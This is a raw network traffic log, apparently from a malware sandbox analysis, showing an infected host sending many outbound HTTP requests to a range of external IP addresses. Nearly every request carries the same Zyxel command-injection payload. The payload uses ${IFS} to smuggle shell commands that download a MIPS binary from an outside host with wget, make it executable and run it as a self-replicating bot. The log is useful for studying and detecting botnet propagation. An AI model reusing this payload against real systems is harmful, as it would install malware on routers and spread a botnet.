                                            Jan 14, 2024 15:50:52.674052000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7904192.168.2.2355858122.224.239.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674101114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7905192.168.2.235872698.126.252.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674113989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7906192.168.2.2348304131.245.150.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674155951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7907192.168.2.2347998109.114.84.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674185038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7908192.168.2.2342946200.32.150.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674187899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7909192.168.2.2359878131.20.79.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674201965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7910192.168.2.2354436159.145.106.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674252987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7911192.168.2.2350676218.248.23.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674285889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7912192.168.2.2356478166.89.94.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674314976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7913192.168.2.2341206112.163.63.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674339056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7914192.168.2.2339840106.155.145.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674374104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7915192.168.2.2359920200.87.21.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674397945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7916192.168.2.233951694.76.59.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674428940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7917192.168.2.236009637.135.143.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674451113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7918192.168.2.2343078192.108.4.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674487114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7919192.168.2.2355778166.221.136.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674544096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7920192.168.2.2358996140.70.61.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674571991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7921192.168.2.233665247.139.184.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674603939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7922192.168.2.233284682.18.171.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674655914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7923192.168.2.2350792180.141.161.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674684048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7924192.168.2.235644450.210.91.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674698114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7925192.168.2.233406295.227.210.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674746990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7926192.168.2.235518838.160.246.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674746990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7927192.168.2.2359956146.94.205.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674772024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7928192.168.2.235200885.77.202.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674817085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7929192.168.2.2341584183.195.63.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674823999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7930192.168.2.2354848190.181.129.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674844027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7931192.168.2.2352790126.99.146.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674889088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7932192.168.2.2344546114.82.35.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674896002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7933192.168.2.2339808160.135.32.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674923897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7934192.168.2.2333052160.102.95.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674941063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7935192.168.2.2355286173.245.103.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.674962997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7936192.168.2.234240646.140.53.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675010920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7937192.168.2.2336932135.79.240.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675034046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7938192.168.2.234224478.105.172.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675061941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7939192.168.2.235752844.145.6.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675091028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7940192.168.2.235020423.174.175.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675131083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7941192.168.2.2350582196.237.191.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675132990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7942192.168.2.2333314178.39.184.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675167084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7943192.168.2.234675042.33.219.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675208092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7944192.168.2.2333700145.110.181.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675260067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7945192.168.2.2342234221.59.116.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.675286055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7946192.168.2.2340624203.189.107.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677655935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7947192.168.2.2345080220.133.175.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677731037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7948192.168.2.2339850200.103.150.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677736998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7949192.168.2.2356796141.227.214.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677758932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7950192.168.2.235447434.180.156.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677777052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7951192.168.2.2351466113.224.140.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677799940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7952192.168.2.23515522.14.46.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677819967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7953192.168.2.2350658126.79.1.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677845955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7954192.168.2.234736419.120.107.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677874088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7955192.168.2.2332848112.247.118.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677948952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7956192.168.2.233480860.210.111.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.677962065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7957192.168.2.2342776202.8.173.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.678016901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7958192.168.2.234619240.174.21.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679141998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7959192.168.2.235904470.178.213.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679248095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7960192.168.2.234456876.184.168.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679294109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7961192.168.2.236045418.94.111.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679362059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7962192.168.2.234216057.219.201.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679374933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7963192.168.2.2354100144.218.82.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679409027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7964192.168.2.2344812133.21.180.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679445982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7965192.168.2.234353432.49.70.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.679455996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7966192.168.2.23444244.204.73.226443
                                            TimestampBytes transferredDirectionData
